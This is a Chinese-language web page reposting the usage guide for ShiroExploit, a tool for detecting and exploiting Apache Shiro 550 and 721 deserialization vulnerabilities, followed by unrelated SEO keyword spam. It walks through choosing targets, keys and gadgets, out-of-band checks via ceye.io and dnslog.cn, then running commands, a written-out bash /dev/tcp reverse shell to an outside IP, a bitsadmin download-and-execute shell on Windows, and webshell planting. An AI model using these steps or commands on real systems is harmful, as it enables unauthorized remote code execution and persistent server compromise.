千家信息网

请输入关键字词

热门搜索排行

最新搜索排行

导航: 首页 > 互联网科技 >

Shiro漏洞检测工具ShiroExploit怎么使用

发表于:2025-02-01 作者:千家信息网编辑
千家信息网最后更新 2025年02月01日,本篇内容主要讲解"Shiro漏洞检测工具ShiroExploit怎么使用",感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习"Shiro漏洞检测工具ShiroEx
千家信息网最后更新 2025年02月01日Shiro漏洞检测工具ShiroExploit怎么使用

本篇内容主要讲解"Shiro漏洞检测工具ShiroExploit怎么使用",感兴趣的朋友不妨来看看。本文介绍的方法操作简单快捷,实用性强。下面就让小编来带大家学习"Shiro漏洞检测工具ShiroExploit怎么使用"吧!

ShiroExploit

支持对Shiro550(硬编码秘钥)和Shiro721(Padding Oracle)的一键化检测,支持简单回显。


使用说明

第一步:按要求输入要检测的目标URL和选择漏洞类型

  • Shiro550 无需提供rememberMe Cookie, Shiro721 需要提供一个有效的rememberMe Cookie
  • Shiro550 无需选择操作系统类型, Shiro721 需要选择操作系统类型
  • 可以手工指定特定的 Key 和 Gadget,默认不指定,会遍历所有的 Key 和 Gadget
  • 复杂Http请求支持直接粘贴数据包

第二步: 选择攻击方式



选择使用 ceye.io 进行漏洞检测
  • 可以不进行任何配置,配置文件中已经预置了 CEYE 域名和对应的 Token,当然也可以对其进行修改。
  • 程序会首先使用 URLDNS 筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload
  • 缺点:程序会使用 API: http://api.ceye.io/v1/records?token=a78a1cb49d91fe09e01876078d1868b2&type=dns&filter=[UUID] 查询检测结果,这个 API 有时候会无法正常访问,导致在这种方式下无法找到 Key 或者有效的 Gadget
选择 使用 dnslog.cn 进行漏洞检测
  • 可以不进行任何配置,每次启动时程序会自动从 dnslog.cn 申请一个 DNS Record。
  • 程序会首先使用 URLDNS 筛选出唯一 Key,然后依次调用各个 Gadget 生成 Payload
  • 缺点:少数时候 dnslog.cn 会间隔较久才显示 DNS 解析结果导致程序无法找到 Key 或者有效的 Gadget,且 dnslog.cn 只会记录最近的10条 DNS 解析记录
选择 使用 JRMP + dnslog 进行漏洞检测
  • 需要在 VPS 上通过命令 java -cp ShiroExploit.jar com.shiroexploit.server.BasicHTTPServer [HttpSerivce Port] [JRMPListener Port] 开启HttpService/JRMPListener,并按照要求填入相应 IP 和端口
  • 如果开启 HttpService/JRMPListener 时未指定端口号,则 HTTPService 默认监听 8080 端口, JRMPListener 默认监听 8088 端口
  • 使用 JRMP 的方式进行漏洞检测,可以显著减小 cookie 大小
  • 程序会首先使用 URLDNS 筛选出唯一 Key,然后使用 JRMP 依次为各个 Gadget 生成对应的 JRMPListener
选择 使用回显进行漏洞检测
  • 针对不出网的情况进行漏洞检测,此时可以检测的 Gadget 类型会少于使用 DNSLog 方式的 Gadget类型
  • 目前主要是通过将命令执行结果写入 Web 目录下然后读取的方式实现回显
  • 需要提供一个静态资源 URL,程序会将此静态资源所在的目录当做写入目录
  • 注:开始的时候使用 https://blog.csdn.net/fnmsd/article/details/106709736 介绍的方式实现回显,在本地可以测试成功,但是在实际环境中基本不成功(可能是我的姿势有问题,欢迎探讨),所以目前是通过读写文件的方式实现回显,后期可能会加入其它方式

第三步:检测漏洞并执行命令

  • 程序在判断目标应用是否存在漏洞时,窗口上部的输入框无法进行输入。当程序检测出目标应用存在漏洞时,输入框可以进行输入并执行命令。
  • 反弹shell(linux) 采用 bash -i >& /dev/tcp/1.2.3.4/443 0>&1 的方式反弹 shell
  • 反弹shell(Windows) 采用 bitsadmin 下载指定 URL 的 exe 文件并执行的方式获取 shell


  • 获取Webshell 可以在能够回显的情况下直接在使用者给出的路径(目录需要真实存在)下写入 webshell, webshell 名称和后缀名由使用者自行指定,webshell 的内容从 config 目录下的 shell.jsp 中读取

备注

在使用漏洞检测主程序或者开启 HttpService/JRMPListener 时,均需要ysoserial.jar的支持,将ysoserial.jar和ShiroExploit.jar放置在同一目录即可。

到此,相信大家对"Shiro漏洞检测工具ShiroExploit怎么使用"有了更深的了解,不妨来实际操作一番吧!这里是网站,更多相关内容可以进入相关频道进行查询,关注我们,继续学习!

很赞哦!
检测 漏洞 方式 程序 选择 目录 类型 输入 命令 支持 工具 有效 内容 文件 目标 端口 结果 选出 生成 配置 数据库的安全要保护哪些东西 数据库安全各自的含义是什么 生产安全数据库录入 数据库的安全性及管理 数据库安全策略包含哪些 海淀数据库安全审计系统 建立农村房屋安全信息数据库 易用的数据库客户端支持安全管理 连接数据库失败ssl安全错误 数据库的锁怎样保障安全 谷歌服务器怎么玩国际服云顶之弈 phpcms数据库结构 服务器运行多少小时 梦幻西游软件开发 租赁服务器怎样定价 上海app软件开发价格 echart 数据库 通达oa更换服务器 数据库职工部门关系模式图 jsp需要web服务器吗 医院网络安全建设理论法制定律 中小型企业与网络技术的关系 黔西南服务器代理商 普陀区参考网络技术服务口碑推荐 软件开发研究毕业论文 中国网络安全为什么这么强 怎么管理服务器存储 家庭网络安全教育平台 惠州步升网络技术有限公司长沙 数据库备份专家怎么使用 网络安全在企业中物理安全 数据库安全性登录名在哪里 网络安全主题网评征文 外国网络安全 保险 数据库 字段 MBC数据库的检索式一般怎么写 荒野大镖客2服务器老是掉线 满足10w并发量的阿里云服务器 湖北pdu服务器电源出售 滨州智慧党建软件开发

相关文章

0